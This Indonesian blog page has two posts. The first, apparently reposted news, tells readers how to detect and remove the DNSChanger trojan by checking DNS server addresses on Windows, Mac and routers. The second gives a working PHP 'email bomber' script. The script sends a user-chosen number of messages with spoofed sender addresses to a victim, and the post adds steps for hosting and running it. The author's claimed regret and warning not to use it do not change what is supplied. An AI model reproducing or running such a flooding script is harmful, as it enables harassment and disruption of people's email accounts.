Tak perlu cemas jelang 9 Juli 2012 walau ada ancaman kiamat internet terhadap sekitar 1 juta komputer. Ada sedikit harapan meski tinggal empat hari server DNS belum juga terbebas dari serangan malware bernama DNAChanger trojan. 

Biro Federal Investigasi memang belum memastikan seluruh server DNS tak terinfeksi dan bisa disembuhkan dari serangannya. DNS atau Domain Name System adalah layanan internet yang mengubah nama domain seperti www.tempo.co menjadi kode angka sehingga antar komputer bisa saling berkomunikasi. Sejak tahun lalu, sebuah malware bernama DNAChanger trojan menyerang ratusan ribu komputer.

Mari belajar bagaimana mengatasinya. Cara paling awal adalah dengan mendeteksi serangan trojan ini. Situs dns-ok.us akan memberi panduan kondisi komputer Anda. Jika router Anda terinfeksi, situs dns-ok.us pun akan beranggapan komputer Anda terjangkit DNSChanger trojan, meskipun sebenarnya tidak. Yang lebih buruk lagi, jika ISP Anda mengatur ulang lalu lintas DNS, maka kemungkinan komputer terlihat bersih. Walaupun ada kemungkinan pengaturan DNS Anda sudah diubah oleh virus jahat.

Jika Anda ingin benar-benar mengetahui apakah komputer anda terbebas dari penyebab Kiamat Internet, maka Anda harus melihat secara manual alamat IP server DNS. Alamat IP tersebut akan menunjukkan dengan siapa saja komputer Anda saling berkomunikasi. Dari situ bisa diamati apakah ada serangan apakah bisa dihapus.

Pada komputer berbasis Windows 7, bukalah start menu dan jalankan aplikasi Command Prompt. Atau bisa juga mengetik cmd di kolom search start menu. Ketika command prompt terbuka, maka ketik ipconfig /allcompartments /all dan tekan enter. Layar akan menampilkan sejumlah teks. Telusuri tulisan itu ke bawah hingga menemukan baris bertuliskan DNS Server. Lalu salin ke bawah sejumlah kode string yang mengikuti server DNS. Kalau banyak berarti, komputer anda mengakses lebih dari satu server.

Bagi pengguna komputer berbasis Mac OS X, caranya lebih mudah. Buka Apple menu, biasanya berlokasi di sudut kiri atas layar, pilih system preference. Lalu klik ikon network untuk membuka menu network setting. Arahkan ke advance setting dan salin ke bawah sejumlah kode string yang terdapat dalam box server DNS.

Jika Anda sudah mengetahui alamat IP yang digunakan server DNS makan salin dan tempel ke situs milik FBI. Situs FBI DNSChanger akan memberitahu apakah komputer Anda menggunakan server DNS yang nakal atau tidak. Lalu jika positif kena, apa yang harus dilakukan.

Pertama tentuya menyelamatkan data. Buat back-up data-data penting lalu format ulang piranti keras komputer Anda dan instal ulang sistem operasinya. Atau bisa juga tanpa instal ulang, tapi dengan alat penghapus seperti Kaspersky Labs TDSSKiller. Sebuah piranti lunak besutan perusahaan antivirus Rusia untuk menghilangkan DNSChanger trojan.

Jika serangan sudah masuk jaringan, maka Anda harus mengecek setiap komputer dalam jaringan. Lalu cek juga pengaturan router untuk memastikan tidak terinfeksi. Cara mengecek DNS router, serupa dengan mengecek DNS komputer. Salin alamat IP server DNS router lalu masukkan ke situs FBI apakah layanan tersebut aman atau tidak. Jika tidak aman, maka reset pengaturan router Anda. Terakhir, jangan lupa setelah semua diatur ulang, jalani lagi prosedur pengecekan dari awal.

Semoga berita ini bermanfaat bagi kita semua jangan lupa komentarnya makasi...!!!!

Kamis, 05 Juli 2012

Script BOM E-Mail Menggunakan PHP

Ini kerjaan usil waktu masih duduk dibangku Kuliah dulu. Mulai dari belajar ngehack, ngedeface, mencuri kuota temen sampai mengirim pesan ke email temen yang jumlahnya ribuan bahkan jutaan. Alamat email email bomber email bomb program email bomb online flood email email bomb software make email bomb Penelusuran yang terkait dengan bom email cara membuat bom email cara boom email  bom email software bom email bom 2011 bom friends sign up bom, bom email teman.
bom email - flood email
Saya akan ngebahas kejahatan saya bagian mengirim mail yang jumlahnya ribuan, tapi sekarang saya udah sadar kalo hal itu salah, tidak ada gunanya serta tidak ada untungnya dan tak layak untuk ditiru.
Jadi mohon di maafkan ya teman – teman kalo saya pernah ngusilin kalian. Hehe.. :)
Berikut contoh potongan programnya:






  
  Dari : ”>
  Kepada : ”>
  Jumlah : ”>
  Isi Pesan: 
  
  


if ($ok==”ok”)
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,”",”From : $a <$a>”);
}
echo (“Beres Bos”);
}
?>


Lalu simpan code tersebut dalam sebuah file, misalkan email-bomber.php
Selanjutnya masukkan file tersebut dalam webserver atau webhosting kamu.
Langkah berikutnya buka browser lalu masukkan alamat dimana kamu menyimpan file tersebut misalkan http://namadomainkamu.com/email-bomber.php
Jika alamat e-mail yang ditujukan benar maka akan secara otomatis mengirimkan pesan ke email korban.
Pesan terakhir jangan dilakukan karena Tuhan maha tahu dan kalo ada salah kata mohon di maafkan.
Media Promosi Iklan PPC Indonesia

You can replace this text by going to "Layout" and then "Page Elements" section. Edit " About "